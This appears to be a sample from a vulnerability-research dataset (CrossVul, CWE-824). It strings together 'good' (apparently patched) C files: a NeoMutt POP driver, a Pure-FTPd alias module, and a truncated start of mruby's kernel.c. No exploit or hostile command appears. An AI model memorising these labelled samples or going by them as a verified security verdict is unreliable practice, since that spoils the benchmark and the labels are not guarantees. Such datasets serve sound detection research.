#include <string.h>
#include <unistd.h>
#include "mutt/mutt.h"
#include "conn/conn.h"
#include "mutt.h"
#include "pop.h"
#include "bcache.h"
#include "body.h"
#include "context.h"
#include "envelope.h"
#include "globals.h"
#include "header.h"
#include "mailbox.h"
#include "mutt_account.h"
#include "mutt_curses.h"
#include "mutt_socket.h"
#include "mx.h"
#include "ncrypt/ncrypt.h"
#include "options.h"
#include "progress.h"
#include "protos.h"
#include "url.h"
#ifdef USE_HCACHE
#include "hcache/hcache.h"
#endif
#ifdef USE_HCACHE
#define HC_FNAME "neomutt" /* filename for hcache as POP lacks paths */
#define HC_FEXT "hcache" /* extension for hcache as POP lacks paths */
#endif
/**
* cache_id - Make a message-cache-compatible id
* @param id POP message id
* @retval ptr Sanitised string
*
* The POP message id may contain '/' and other awkward characters.
*
* @note This function returns a pointer to a static buffer.
*/
static const char *cache_id(const char *id)
{
static char clean[SHORT_STRING];
mutt_str_strfcpy(clean, id, sizeof(clean));
mutt_file_sanitize_filename(clean, true);
return clean;
}
/**
* fetch_message - write line to file
* @param line String to write
* @param file FILE pointer to write to
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_message(char *line, void *file)
{
FILE *f = (FILE *) file;
fputs(line, f);
if (fputc('\n', f) == EOF)
return -1;
return 0;
}
/**
* pop_read_header - Read header
* @param pop_data POP data
* @param h Email header
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_read_header(struct PopData *pop_data, struct Header *h)
{
int rc, index;
size_t length;
char buf[LONG_STRING];
FILE *f = mutt_file_mkstemp();
if (!f)
{
mutt_perror("mutt_file_mkstemp failed!");
return -3;
}
snprintf(buf, sizeof(buf), "LIST %d\r\n", h->refno);
rc = pop_query(pop_data, buf, sizeof(buf));
if (rc == 0)
{
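/* a successful LIST reply is "+OK <msgnum> <size in octets>" (RFC 1939);
 * the size is used below to derive the body length
 */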
sscanf(buf, "+OK %d %zu", &index, &length);
snprintf(buf, sizeof(buf), "TOP %d 0\r\n", h->refno);
rc = pop_fetch_data(pop_data, buf, NULL, fetch_message, f);
if (pop_data->cmd_top == 2)
{
if (rc == 0)
{
pop_data->cmd_top = 1;
mutt_debug(1, "set TOP capability\n");
}
if (rc == -2)
{
pop_data->cmd_top = 0;
mutt_debug(1, "unset TOP capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command TOP is not supported by server."));
}
}
}
switch (rc)
{
case 0:
{
rewind(f);
h->env = mutt_rfc822_read_header(f, h, 0, 0);
h->content->length = length - h->content->offset + 1;
rewind(f);
while (!feof(f))
{
h->content->length--;
fgets(buf, sizeof(buf), f);
}
break;
}
case -2:
{
mutt_error("%s", pop_data->err_msg);
break;
}
case -3:
{
mutt_error(_("Can't write header to temporary file!"));
break;
}
}
mutt_file_fclose(&f);
return rc;
}
/**
* fetch_uidl - parse UIDL
* @param line String to parse
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
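 *
 * Each line handed to this callback is one UIDL response entry of the form
 * "<message-number> <unique-id>" (e.g. "1 whqtswO00WBw418f9t5J", an
 * illustrative value only); the number is parsed with strtol() and the
 * remainder of the line is kept as the message's unique id.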
*/
static int fetch_uidl(char *line, void *data)
{
int i, index;
struct Context *ctx = (struct Context *) data;
struct PopData *pop_data = (struct PopData *) ctx->data;
char *endp = NULL;
errno = 0;
index = strtol(line, &endp, 10);
if (errno)
return -1;
while (*endp == ' ')
endp++;
memmove(line, endp, strlen(endp) + 1);
  /* uid must be at least 1 byte */
if (strlen(line) == 0)
return -1;
for (i = 0; i < ctx->msgcount; i++)
if (mutt_str_strcmp(line, ctx->hdrs[i]->data) == 0)
break;
if (i == ctx->msgcount)
{
mutt_debug(1, "new header %d %s\n", index, line);
if (i >= ctx->hdrmax)
mx_alloc_memory(ctx);
ctx->msgcount++;
ctx->hdrs[i] = mutt_header_new();
ctx->hdrs[i]->data = mutt_str_strdup(line);
}
else if (ctx->hdrs[i]->index != index - 1)
pop_data->clear_cache = true;
ctx->hdrs[i]->refno = index;
ctx->hdrs[i]->index = index - 1;
return 0;
}
/**
* msg_cache_check - Check the Body Cache for an ID
* @param id Cache ID
* @param bcache Body cache
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int msg_cache_check(const char *id, struct BodyCache *bcache, void *data)
{
struct Context *ctx = (struct Context *) data;
if (!ctx)
return -1;
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return -1;
#ifdef USE_HCACHE
/* keep hcache file if hcache == bcache */
if (strcmp(HC_FNAME "." HC_FEXT, id) == 0)
return 0;
#endif
for (int i = 0; i < ctx->msgcount; i++)
{
/* if the id we get is known for a header: done (i.e. keep in cache) */
if (ctx->hdrs[i]->data && (mutt_str_strcmp(ctx->hdrs[i]->data, id) == 0))
return 0;
}
/* message not found in context -> remove it from cache
* return the result of bcache, so we stop upon its first error
*/
return mutt_bcache_del(bcache, cache_id(id));
}
#ifdef USE_HCACHE
/**
* pop_hcache_namer - Create a header cache filename for a POP mailbox
* @param path Path of mailbox
* @param dest Buffer for filename
* @param destlen Length of buffer
* @retval num Characters written to buffer
*/
static int pop_hcache_namer(const char *path, char *dest, size_t destlen)
{
return snprintf(dest, destlen, "%s." HC_FEXT, path);
}
/**
* pop_hcache_open - Open the header cache
* @param pop_data POP server data
* @param path Path to the mailbox
* @retval ptr Header cache
*/
static header_cache_t *pop_hcache_open(struct PopData *pop_data, const char *path)
{
struct Url url;
char p[LONG_STRING];
if (!pop_data || !pop_data->conn)
return mutt_hcache_open(HeaderCache, path, NULL);
mutt_account_tourl(&pop_data->conn->account, &url);
url.path = HC_FNAME;
url_tostring(&url, p, sizeof(p), U_PATH);
return mutt_hcache_open(HeaderCache, p, pop_hcache_namer);
}
#endif
/**
* pop_fetch_headers - Read headers
* @param ctx Context
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_fetch_headers(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = pop_hcache_open(pop_data, ctx->path);
#endif
time(&pop_data->check_time);
pop_data->clear_cache = false;
for (int i = 0; i < ctx->msgcount; i++)
ctx->hdrs[i]->refno = -1;
const int old_count = ctx->msgcount;
int ret = pop_fetch_data(pop_data, "UIDL\r\n", NULL, fetch_uidl, ctx);
const int new_count = ctx->msgcount;
ctx->msgcount = old_count;
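  /* fetch_uidl() appended headers for any new UIDs and bumped ctx->msgcount;
   * reset it to old_count here and re-count the new entries one by one below,
   * once their headers have actually been fetched or restored */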
if (pop_data->cmd_uidl == 2)
{
if (ret == 0)
{
pop_data->cmd_uidl = 1;
mutt_debug(1, "set UIDL capability\n");
}
if (ret == -2 && pop_data->cmd_uidl == 2)
{
pop_data->cmd_uidl = 0;
mutt_debug(1, "unset UIDL capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command UIDL is not supported by server."));
}
}
if (!ctx->quiet)
{
mutt_progress_init(&progress, _("Fetching message headers..."),
MUTT_PROGRESS_MSG, ReadInc, new_count - old_count);
}
if (ret == 0)
{
int i, deleted;
for (i = 0, deleted = 0; i < old_count; i++)
{
if (ctx->hdrs[i]->refno == -1)
{
ctx->hdrs[i]->deleted = true;
deleted++;
}
}
if (deleted > 0)
{
mutt_error(
ngettext("%d message has been lost. Try reopening the mailbox.",
"%d messages have been lost. Try reopening the mailbox.", deleted),
deleted);
}
bool hcached = false;
for (i = old_count; i < new_count; i++)
{
if (!ctx->quiet)
mutt_progress_update(&progress, i + 1 - old_count, -1);
#ifdef USE_HCACHE
void *data = mutt_hcache_fetch(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
if (data)
{
char *uidl = mutt_str_strdup(ctx->hdrs[i]->data);
int refno = ctx->hdrs[i]->refno;
int index = ctx->hdrs[i]->index;
/*
* - POP dynamically numbers headers and relies on h->refno
* to map messages; so restore header and overwrite restored
* refno with current refno, same for index
       * - h->data needs to be a separate pointer as it's driver-specific
* data freed separately elsewhere
* (the old h->data should point inside a malloc'd block from
* hcache so there shouldn't be a memleak here)
*/
struct Header *h = mutt_hcache_restore((unsigned char *) data);
mutt_hcache_free(hc, &data);
mutt_header_free(&ctx->hdrs[i]);
ctx->hdrs[i] = h;
ctx->hdrs[i]->refno = refno;
ctx->hdrs[i]->index = index;
ctx->hdrs[i]->data = uidl;
ret = 0;
hcached = true;
}
else
#endif
if ((ret = pop_read_header(pop_data, ctx->hdrs[i])) < 0)
break;
#ifdef USE_HCACHE
else
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
/*
* faked support for flags works like this:
* - if 'hcached' is true, we have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: old
* (if $mark_old is set which is maybe wrong as
* $mark_old should be considered for syncing the
* folder and not when opening it XXX)
* - if 'hcached' is false, we don't have the message in our hcache:
* - if we also have a body: read
* - if we don't have a body: new
*/
const bool bcached =
(mutt_bcache_exists(pop_data->bcache, cache_id(ctx->hdrs[i]->data)) == 0);
ctx->hdrs[i]->old = false;
ctx->hdrs[i]->read = false;
if (hcached)
{
if (bcached)
ctx->hdrs[i]->read = true;
else if (MarkOld)
ctx->hdrs[i]->old = true;
}
else
{
if (bcached)
ctx->hdrs[i]->read = true;
}
ctx->msgcount++;
}
if (i > old_count)
mx_update_context(ctx, i - old_count);
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret < 0)
{
for (int i = ctx->msgcount; i < new_count; i++)
mutt_header_free(&ctx->hdrs[i]);
return ret;
}
/* after putting the result into our structures,
* clean up cache, i.e. wipe messages deleted outside
* the availability of our cache
*/
if (MessageCacheClean)
mutt_bcache_list(pop_data->bcache, msg_cache_check, (void *) ctx);
mutt_clear_error();
return (new_count - old_count);
}
/**
* pop_open_mailbox - open POP mailbox, fetch only headers
* @param ctx Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_open_mailbox(struct Context *ctx)
{
char buf[PATH_MAX];
struct Connection *conn = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
struct Url url;
if (pop_parse_path(ctx->path, &acct))
{
mutt_error(_("%s is an invalid POP path"), ctx->path);
return -1;
}
mutt_account_tourl(&acct, &url);
url.path = NULL;
url_tostring(&url, buf, sizeof(buf), 0);
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return -1;
FREE(&ctx->path);
FREE(&ctx->realpath);
ctx->path = mutt_str_strdup(buf);
ctx->realpath = mutt_str_strdup(ctx->path);
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
ctx->data = pop_data;
if (pop_open_connection(pop_data) < 0)
return -1;
conn->data = pop_data;
pop_data->bcache = mutt_bcache_open(&acct, NULL);
/* init (hard-coded) ACL rights */
memset(ctx->rights, 0, sizeof(ctx->rights));
mutt_bit_set(ctx->rights, MUTT_ACL_SEEN);
mutt_bit_set(ctx->rights, MUTT_ACL_DELETE);
#ifdef USE_HCACHE
/* flags are managed using header cache, so it only makes sense to
* enable them in that case */
mutt_bit_set(ctx->rights, MUTT_ACL_WRITE);
#endif
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Fetching list of messages..."));
const int ret = pop_fetch_headers(ctx);
if (ret >= 0)
return 0;
if (ret < -1)
{
mutt_sleep(2);
return -1;
}
}
}
/**
* pop_clear_cache - delete all cached messages
* @param pop_data POP server data
*/
static void pop_clear_cache(struct PopData *pop_data)
{
if (!pop_data->clear_cache)
return;
mutt_debug(1, "delete cached messages\n");
for (int i = 0; i < POP_CACHE_LEN; i++)
{
if (pop_data->cache[i].path)
{
unlink(pop_data->cache[i].path);
FREE(&pop_data->cache[i].path);
}
}
}
/**
* pop_close_mailbox - close POP mailbox
* @param ctx Mailbox Context
* @retval 0 Always
*/
static int pop_close_mailbox(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return 0;
pop_logout(ctx);
if (pop_data->status != POP_NONE)
mutt_socket_close(pop_data->conn);
pop_data->status = POP_NONE;
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
if (!pop_data->conn->data)
mutt_socket_free(pop_data->conn);
mutt_bcache_close(&pop_data->bcache);
return 0;
}
/**
* pop_fetch_message - fetch message from POP server
* @param ctx Mailbox Context
* @param msg Message
* @param msgno Message number
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_fetch_message(struct Context *ctx, struct Message *msg, int msgno)
{
void *uidl = NULL;
char buf[LONG_STRING];
char path[PATH_MAX];
struct Progress progressbar;
struct PopData *pop_data = (struct PopData *) ctx->data;
struct PopCache *cache = NULL;
struct Header *h = ctx->hdrs[msgno];
unsigned short bcache = 1;
/* see if we already have the message in body cache */
msg->fp = mutt_bcache_get(pop_data->bcache, cache_id(h->data));
if (msg->fp)
return 0;
/*
* see if we already have the message in our cache in
* case $message_cachedir is unset
*/
cache = &pop_data->cache[h->index % POP_CACHE_LEN];
if (cache->path)
{
if (cache->index == h->index)
{
/* yes, so just return a pointer to the message */
msg->fp = fopen(cache->path, "r");
if (msg->fp)
return 0;
mutt_perror(cache->path);
return -1;
}
else
{
/* clear the previous entry */
unlink(cache->path);
FREE(&cache->path);
}
}
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
    /* verify that the message index is correct */
if (h->refno < 0)
{
mutt_error(
_("The message index is incorrect. Try reopening the mailbox."));
return -1;
}
mutt_progress_init(&progressbar, _("Fetching message..."), MUTT_PROGRESS_SIZE,
NetInc, h->content->length + h->content->offset - 1);
/* see if we can put in body cache; use our cache as fallback */
msg->fp = mutt_bcache_put(pop_data->bcache, cache_id(h->data));
if (!msg->fp)
{
/* no */
bcache = 0;
mutt_mktemp(path, sizeof(path));
msg->fp = mutt_file_fopen(path, "w+");
if (!msg->fp)
{
mutt_perror(path);
return -1;
}
}
snprintf(buf, sizeof(buf), "RETR %d\r\n", h->refno);
const int ret = pop_fetch_data(pop_data, buf, &progressbar, fetch_message, msg->fp);
if (ret == 0)
break;
mutt_file_fclose(&msg->fp);
/* if RETR failed (e.g. connection closed), be sure to remove either
* the file in bcache or from POP's own cache since the next iteration
* of the loop will re-attempt to put() the message */
if (!bcache)
unlink(path);
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
if (ret == -3)
{
mutt_error(_("Can't write message to temporary file!"));
return -1;
}
}
/* Update the header information. Previously, we only downloaded a
* portion of the headers, those required for the main display.
*/
if (bcache)
mutt_bcache_commit(pop_data->bcache, cache_id(h->data));
else
{
cache->index = h->index;
cache->path = mutt_str_strdup(path);
}
rewind(msg->fp);
uidl = h->data;
  /* we replace the envelope, so the key in subj_hash has to be updated as well */
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_delete(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_remove(ctx, h);
mutt_env_free(&h->env);
h->env = mutt_rfc822_read_header(msg->fp, h, 0, 0);
if (ctx->subj_hash && h->env->real_subj)
mutt_hash_insert(ctx->subj_hash, h->env->real_subj, h);
mutt_label_hash_add(ctx, h);
h->data = uidl;
h->lines = 0;
fgets(buf, sizeof(buf), msg->fp);
while (!feof(msg->fp))
{
ctx->hdrs[msgno]->lines++;
fgets(buf, sizeof(buf), msg->fp);
}
h->content->length = ftello(msg->fp) - h->content->offset;
/* This needs to be done in case this is a multipart message */
if (!WithCrypto)
h->security = crypt_query(h->content);
mutt_clear_error();
rewind(msg->fp);
return 0;
}
/**
* pop_close_message - Close POP Message
* @param ctx Mailbox Context
* @param msg Message
* @retval 0 Success
* @retval EOF Error, see errno
*/
static int pop_close_message(struct Context *ctx, struct Message *msg)
{
return mutt_file_fclose(&msg->fp);
}
/**
* pop_sync_mailbox - update POP mailbox, delete messages from server
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_sync_mailbox(struct Context *ctx, int *index_hint)
{
int i, j, ret = 0;
char buf[LONG_STRING];
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = NULL;
#endif
pop_data->check_time = 0;
while (true)
{
if (pop_reconnect(ctx) < 0)
return -1;
mutt_progress_init(&progress, _("Marking messages deleted..."),
MUTT_PROGRESS_MSG, WriteInc, ctx->deleted);
#ifdef USE_HCACHE
hc = pop_hcache_open(pop_data, ctx->path);
#endif
for (i = 0, j = 0, ret = 0; ret == 0 && i < ctx->msgcount; i++)
{
if (ctx->hdrs[i]->deleted && ctx->hdrs[i]->refno != -1)
{
j++;
if (!ctx->quiet)
mutt_progress_update(&progress, j, -1);
snprintf(buf, sizeof(buf), "DELE %d\r\n", ctx->hdrs[i]->refno);
ret = pop_query(pop_data, buf, sizeof(buf));
if (ret == 0)
{
mutt_bcache_del(pop_data->bcache, cache_id(ctx->hdrs[i]->data));
#ifdef USE_HCACHE
mutt_hcache_delete(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data));
#endif
}
}
#ifdef USE_HCACHE
if (ctx->hdrs[i]->changed)
{
mutt_hcache_store(hc, ctx->hdrs[i]->data, strlen(ctx->hdrs[i]->data),
ctx->hdrs[i], 0);
}
#endif
}
#ifdef USE_HCACHE
mutt_hcache_close(hc);
#endif
if (ret == 0)
{
mutt_str_strfcpy(buf, "QUIT\r\n", sizeof(buf));
ret = pop_query(pop_data, buf, sizeof(buf));
}
if (ret == 0)
{
pop_data->clear_cache = true;
pop_clear_cache(pop_data);
pop_data->status = POP_DISCONNECTED;
return 0;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
return -1;
}
}
}
/**
* pop_check_mailbox - Check for new messages and fetch headers
* @param ctx Mailbox Context
* @param index_hint Current Message
* @retval 0 Success
* @retval -1 Failure
*/
static int pop_check_mailbox(struct Context *ctx, int *index_hint)
{
int ret;
struct PopData *pop_data = (struct PopData *) ctx->data;
if ((pop_data->check_time + PopCheckinterval) > time(NULL))
return 0;
pop_logout(ctx);
mutt_socket_close(pop_data->conn);
if (pop_open_connection(pop_data) < 0)
return -1;
ctx->size = pop_data->size;
mutt_message(_("Checking for new messages..."));
ret = pop_fetch_headers(ctx);
pop_clear_cache(pop_data);
if (ret < 0)
return -1;
if (ret > 0)
return MUTT_NEW_MAIL;
return 0;
}
/**
* pop_fetch_mail - Fetch messages and save them in $spoolfile
*/
void pop_fetch_mail(void)
{
char buffer[LONG_STRING];
char msgbuf[SHORT_STRING];
char *url = NULL, *p = NULL;
int delanswer, last = 0, msgs, bytes, rset = 0, ret;
struct Connection *conn = NULL;
struct Context ctx;
struct Message *msg = NULL;
struct Account acct;
struct PopData *pop_data = NULL;
if (!PopHost)
{
mutt_error(_("POP host is not defined."));
return;
}
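  /* the extra 7 bytes leave room for the "pop://" prefix (6 chars) plus the
   * trailing NUL, in case PopHost was given without a URL scheme */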
url = p = mutt_mem_calloc(strlen(PopHost) + 7, sizeof(char));
if (url_check_scheme(PopHost) == U_UNKNOWN)
{
strcpy(url, "pop://");
p = strchr(url, '\0');
}
strcpy(p, PopHost);
ret = pop_parse_path(url, &acct);
FREE(&url);
if (ret)
{
mutt_error(_("%s is an invalid POP path"), PopHost);
return;
}
conn = mutt_conn_find(NULL, &acct);
if (!conn)
return;
pop_data = mutt_mem_calloc(1, sizeof(struct PopData));
pop_data->conn = conn;
if (pop_open_connection(pop_data) < 0)
{
mutt_socket_free(pop_data->conn);
FREE(&pop_data);
return;
}
conn->data = pop_data;
mutt_message(_("Checking for new messages..."));
/* find out how many messages are in the mailbox. */
mutt_str_strfcpy(buffer, "STAT\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
goto finish;
}
sscanf(buffer, "+OK %d %d", &msgs, &bytes);
/* only get unread messages */
if (msgs > 0 && PopLast)
{
mutt_str_strfcpy(buffer, "LAST\r\n", sizeof(buffer));
ret = pop_query(pop_data, buffer, sizeof(buffer));
if (ret == -1)
goto fail;
if (ret == 0)
sscanf(buffer, "+OK %d", &last);
}
if (msgs <= last)
{
mutt_message(_("No new mail in POP mailbox."));
goto finish;
}
if (mx_mbox_open(NONULL(Spoolfile), MUTT_APPEND, &ctx) == NULL)
goto finish;
delanswer = query_quadoption(PopDelete, _("Delete messages from server?"));
snprintf(msgbuf, sizeof(msgbuf),
ngettext("Reading new messages (%d byte)...",
"Reading new messages (%d bytes)...", bytes),
bytes);
mutt_message("%s", msgbuf);
for (int i = last + 1; i <= msgs; i++)
{
msg = mx_msg_open_new(&ctx, NULL, MUTT_ADD_FROM);
if (!msg)
ret = -3;
else
{
snprintf(buffer, sizeof(buffer), "RETR %d\r\n", i);
ret = pop_fetch_data(pop_data, buffer, NULL, fetch_message, msg->fp);
if (ret == -3)
rset = 1;
if (ret == 0 && mx_msg_commit(&ctx, msg) != 0)
{
rset = 1;
ret = -3;
}
mx_msg_close(&ctx, &msg);
}
if (ret == 0 && delanswer == MUTT_YES)
{
/* delete the message on the server */
snprintf(buffer, sizeof(buffer), "DELE %d\r\n", i);
ret = pop_query(pop_data, buffer, sizeof(buffer));
}
if (ret == -1)
{
mx_mbox_close(&ctx, NULL);
goto fail;
}
if (ret == -2)
{
mutt_error("%s", pop_data->err_msg);
break;
}
if (ret == -3)
{
mutt_error(_("Error while writing mailbox!"));
break;
}
/* L10N: The plural is picked by the second numerical argument, i.e.
* the %d right before 'messages', i.e. the total number of messages. */
mutt_message(ngettext("%s [%d of %d message read]",
"%s [%d of %d messages read]", msgs - last),
msgbuf, i - last, msgs - last);
}
mx_mbox_close(&ctx, NULL);
if (rset)
{
/* make sure no messages get deleted */
mutt_str_strfcpy(buffer, "RSET\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
}
finish:
/* exit gracefully */
mutt_str_strfcpy(buffer, "QUIT\r\n", sizeof(buffer));
if (pop_query(pop_data, buffer, sizeof(buffer)) == -1)
goto fail;
mutt_socket_close(conn);
FREE(&pop_data);
return;
fail:
mutt_error(_("Server closed connection!"));
mutt_socket_close(conn);
FREE(&pop_data);
}
// clang-format off
/**
* mx_pop_ops - Mailbox callback functions for POP mailboxes
*/
struct MxOps mx_pop_ops = {
.mbox_open = pop_open_mailbox,
.mbox_open_append = NULL,
.mbox_check = pop_check_mailbox,
.mbox_sync = pop_sync_mailbox,
.mbox_close = pop_close_mailbox,
.msg_open = pop_fetch_message,
.msg_open_new = NULL,
.msg_commit = NULL,
.msg_close = pop_close_message,
.tags_edit = NULL,
.tags_commit = NULL,
};
// clang-format on
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_250_0 |
crossvul-cpp_data_good_4684_0 | /*
0) alias file format.
alternating lines of alias and dir
(this enables embedded whitespace in dir and alias without quoting rules)
optional blank lines
optional lines beginning with '#' as comments
(no you can't put a '#' just anywhere)
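    e.g. a file might look like this (illustrative layout only):
      # map the "pub" alias onto the public tree
      pub
      /var/ftp/pub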
1) data structure for alias list nodes.
typedef struct DirAlias_ {
char *alias;
char *dir;
struct DirAlias *next;
} DirAlias;
2) init routine
A) open alias file
B) while not EOF do
read line
parse line
dir must begin with "/"
allocate DirAlias and members
if tail is NULL then head and tail (global DirAlias_t pointers)
are set to member
else tail->next is set to member and then tail is set to member
3) lookup routine
A) given potential alias return dir or NULL
(walk list starting with head looking for match)
4) FTP CWD command mods
A) if chdir() fails try alias (use lookup routine)
5) FTP SITE ALIAS command
A) list aliases
*/
#include <config.h>
#ifdef WITH_DIRALIASES
#include "ftpd.h"
#include "messages.h"
#include "diraliases.h"
#ifdef WITH_DMALLOC
# include <dmalloc.h>
#endif
static DirAlias *head, *tail;
static signed char aliases_up;
/* returns: 0 on success, -1 on failure */
int init_aliases(void)
{
FILE *fp;
char alias[MAXALIASLEN + 1U];
char dir[PATH_MAX + 1U];
if ((fp = fopen(ALIASES_FILE, "r")) == NULL) {
return 0;
}
while (fgets(alias, sizeof alias, fp) != NULL) {
if (*alias == '#' || *alias == '\n' || *alias == 0) {
continue;
}
{
char * const z = alias + strlen(alias) - 1U;
if (*z != '\n') {
goto bad;
}
*z = 0;
}
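        /* the alias line has been read; its directory is expected on the next
         * non-blank, non-comment line (the file alternates alias/dir lines) */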
do {
if (fgets(dir, sizeof dir, fp) == NULL || *dir == 0) {
goto bad;
}
{
char * const z = dir + strlen(dir) - 1U;
if (*z == '\n') {
*z = 0;
}
}
} while (*dir == '#' || *dir == 0);
if (head == NULL) {
if ((head = tail = malloc(sizeof *head)) == NULL ||
(tail->alias = strdup(alias)) == NULL ||
(tail->dir = strdup(dir)) == NULL) {
die_mem();
}
} else {
DirAlias *curr;
if ((curr = malloc(sizeof *curr)) == NULL ||
(curr->alias = strdup(alias)) == NULL ||
(curr->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = curr;
tail = curr;
}
tail->next = NULL;
}
fclose(fp);
aliases_up++;
return 0;
bad:
fclose(fp);
logfile(LOG_ERR, MSG_ALIASES_BROKEN_FILE " [" ALIASES_FILE "]");
return -1;
}
char *lookup_alias(const char *alias)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
return NULL;
}
while (curr != NULL) {
if (strcmp(curr->alias, alias) == 0) {
return curr->dir;
}
curr = curr->next;
}
return NULL;
}
void print_aliases(void)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
addreply_noformat(502, MSG_CONF_ERR);
return;
}
addreply_noformat(214, MSG_ALIASES_LIST);
while (curr != NULL) {
char line[MAXALIASLEN + PATH_MAX + 3U];
snprintf(line, sizeof line, " %s %s", curr->alias, curr->dir);
addreply_noformat(0, line);
curr = curr->next;
}
addreply_noformat(214, " ");
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_4684_0 |
crossvul-cpp_data_good_168_0 | /*
** kernel.c - Kernel module
**
** See Copyright Notice in mruby.h
*/
#include <mruby.h>
#include <mruby/array.h>
#include <mruby/hash.h>
#include <mruby/class.h>
#include <mruby/proc.h>
#include <mruby/string.h>
#include <mruby/variable.h>
#include <mruby/error.h>
#include <mruby/istruct.h>
typedef enum {
NOEX_PUBLIC = 0x00,
NOEX_NOSUPER = 0x01,
NOEX_PRIVATE = 0x02,
NOEX_PROTECTED = 0x04,
NOEX_MASK = 0x06,
NOEX_BASIC = 0x08,
NOEX_UNDEF = NOEX_NOSUPER,
NOEX_MODFUNC = 0x12,
NOEX_SUPER = 0x20,
NOEX_VCALL = 0x40,
NOEX_RESPONDS = 0x80
} mrb_method_flag_t;
MRB_API mrb_bool
mrb_func_basic_p(mrb_state *mrb, mrb_value obj, mrb_sym mid, mrb_func_t func)
{
mrb_method_t m = mrb_method_search(mrb, mrb_class(mrb, obj), mid);
struct RProc *p;
if (MRB_METHOD_UNDEF_P(m)) return FALSE;
if (MRB_METHOD_FUNC_P(m))
return MRB_METHOD_FUNC(m) == func;
p = MRB_METHOD_PROC(m);
if (MRB_PROC_CFUNC_P(p) && (MRB_PROC_CFUNC(p) == func))
return TRUE;
return FALSE;
}
static mrb_bool
mrb_obj_basic_to_s_p(mrb_state *mrb, mrb_value obj)
{
return mrb_func_basic_p(mrb, obj, mrb_intern_lit(mrb, "to_s"), mrb_any_to_s);
}
/* 15.3.1.3.17 */
/*
* call-seq:
* obj.inspect -> string
*
* Returns a string containing a human-readable representation of
* <i>obj</i>. If not overridden and no instance variables, uses the
* <code>to_s</code> method to generate the string.
*
* [ 1, 2, 3..4, 'five' ].inspect #=> "[1, 2, 3..4, \"five\"]"
* Time.new.inspect #=> "2008-03-08 19:43:39 +0900"
*/
MRB_API mrb_value
mrb_obj_inspect(mrb_state *mrb, mrb_value obj)
{
if ((mrb_type(obj) == MRB_TT_OBJECT) && mrb_obj_basic_to_s_p(mrb, obj)) {
return mrb_obj_iv_inspect(mrb, mrb_obj_ptr(obj));
}
return mrb_any_to_s(mrb, obj);
}
/* 15.3.1.3.2 */
/*
* call-seq:
* obj === other -> true or false
*
* Case Equality---For class <code>Object</code>, effectively the same
* as calling <code>#==</code>, but typically overridden by descendants
* to provide meaningful semantics in <code>case</code> statements.
*/
static mrb_value
mrb_equal_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "o", &arg);
return mrb_bool_value(mrb_equal(mrb, self, arg));
}
/* 15.3.1.3.3 */
/* 15.3.1.3.33 */
/*
* Document-method: __id__
* Document-method: object_id
*
* call-seq:
* obj.__id__ -> fixnum
* obj.object_id -> fixnum
*
* Returns an integer identifier for <i>obj</i>. The same number will
* be returned on all calls to <code>id</code> for a given object, and
* no two active objects will share an id.
* <code>Object#object_id</code> is a different concept from the
* <code>:name</code> notation, which returns the symbol id of
* <code>name</code>. Replaces the deprecated <code>Object#id</code>.
*/
mrb_value
mrb_obj_id_m(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.2.2 */
/* 15.3.1.2.5 */
/* 15.3.1.3.6 */
/* 15.3.1.3.25 */
/*
* call-seq:
* block_given? -> true or false
* iterator? -> true or false
*
* Returns <code>true</code> if <code>yield</code> would execute a
* block in the current context. The <code>iterator?</code> form
* is mildly deprecated.
*
* def try
* if block_given?
* yield
* else
* "no block"
* end
* end
* try #=> "no block"
* try { "hello" } #=> "hello"
* try do "hello" end #=> "hello"
*/
static mrb_value
mrb_f_block_given_p_m(mrb_state *mrb, mrb_value self)
{
mrb_callinfo *ci = &mrb->c->ci[-1];
mrb_callinfo *cibase = mrb->c->cibase;
